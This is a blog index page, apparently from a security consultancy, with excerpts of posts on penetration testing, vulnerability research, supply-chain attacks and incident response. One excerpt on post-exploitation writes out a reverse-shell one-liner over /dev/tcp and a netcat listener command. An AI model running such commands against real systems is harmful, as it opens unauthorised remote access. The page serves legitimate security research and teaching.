Blog
Mobile device interception with MikroTik
Anybody who has had a conversation with me about networks probably knows that I’m a bit of a MikroTik fanboy, and for good reason. I am also a long-time user and supporter of OpenWrt which makes my enthusiasm for MikroTik even more significant. Somewhere around 16 years ago I got my first router (TP-Link WR1043ND), my first introduction to OpenWrt, and my first USB-serial cable after accidentally flashing an update…
OpenSSL, Certpinning and Memory patching. Sounds fun right?
This blogpost will cover the research I presented at BSides JoBurg. You can watch the talk on YouTube, and code can be found on our GitHub page. This journey started after having looked at some certificate-pinned apps. The majority of apps that appear to implement cert pinning, don’t actually have cert pinning but rather just use a custom trust manager or are not proxy aware (this also applies to things…
From flat networks to locked up domains with tiering models
I’ve been performing internal assessments for seven years and out of all the things I have learnt, one is certain: without a proper tiering model, security tools alone won’t stop your organization from collapsing after a major compromise. In this post I’ll explain what a tiering model is, how to break a flat network even when protections are present, and, most importantly, how to build a defense-in-depth network providing practical…
pipetap – a windows named pipe proxy tool
Windows named pipes, being one of many available mechanisms for inter-component / inter-process communications, is interesting from a security perspective. While hunting for vulnerabilities in various bits of software, I often see the pattern of a privileged process that exposes a named pipe such that a client process can interact with it. More often than not, you’ll eventually be curious enough to want to snoop on the data that is…
Noooooooooo Touch!
TL;DR I presented this work at Insomni’hack, if you’d prefer to watch the recording of that then you can find it here: https://www.youtube.com/watch?v=Nvw_BH7jPzE Imagine you’re on a physical engagement, standing outside an office door. You need an access card but you don’t have one (yet). You notice that there’s a pattern where employees need to tag in, but to leave they just wave their hand and the door swings open.…
A journey implementing Channel Binding on MSSQLClient.py
A few weeks ago my friend Zblurx pushed a PR to Impacket in which he implemented the Channel Binding Token computation based on code that was developed by @lowercase_drm for the ldap3 library. This PR allowed any tool relying on the ldap3 library to be able to connect to LDAP servers even if LDAP signing and LDAPS channel binding are enabled. Looking at the code I thought it would be…
pwning asus driverhub, msi center, acer control centre and razer synapse 4
At the beginning of this year I spent a week finding several vulnerabilities in various “bloatware” software. This was after I got suspicious of how my ASUS motherboard’s “DriverHub” behaved. In the end I looked at 6 targets from 6 random vendors (apart from ASUS) and found vulnerabilities ranging from Remote Code Execution to Local Privilege Escalation in all of them. Those were: ASUS, Acer, Lenovo, HP, MSI and Razer.…
No Egress, No Shell, No Problem
Context, context, context; Alright, imagine this – you’re on an engagement, find a few vulnerabilities, run a few exploits and next thing you know you have Remote Code Execution (RCE). Now, like muscle memory, your next instinct would be to get a shell. Running the following is fairly simple: sh -i >& /dev/tcp/10.0.0.22/4678 0>&1 Then listen in and… nc -lvnp 4678 ... Huh? Sorry, I mean run this, and… 0<&196;exec…
Depscanner: Find orphaned packages before the bad guys do
I recently shared with my colleagues the quickest method to getting banned from pypi.org, but, believe or not, that was not the original intention of the talk. My real intention was to share what the current status of dependency confusion is in 2025 (one flavour of supply chain attacks) and present a tool to detect potential orphan dependencies in GitHub repositories and two short stories, one about great hacking success,…
Investigating an in-the-wild campaign using RCE in CraftCMS
In mid-February, Orange Cyberdefense’s CSIRT was tasked with investigating a server that had been hosting a now-unavailable website. The site had been built using CraftCMS running version 4.12.8. The forensic investigation and post-analysis with the Ethical Hacking team led to the discovery of two CVEs: CVE-2024-58136 and CVE-2025-32432. This blog post aims to present: The investigation that led to the finding of those two CVEs, and details of the different…
Page 1 of 58
Next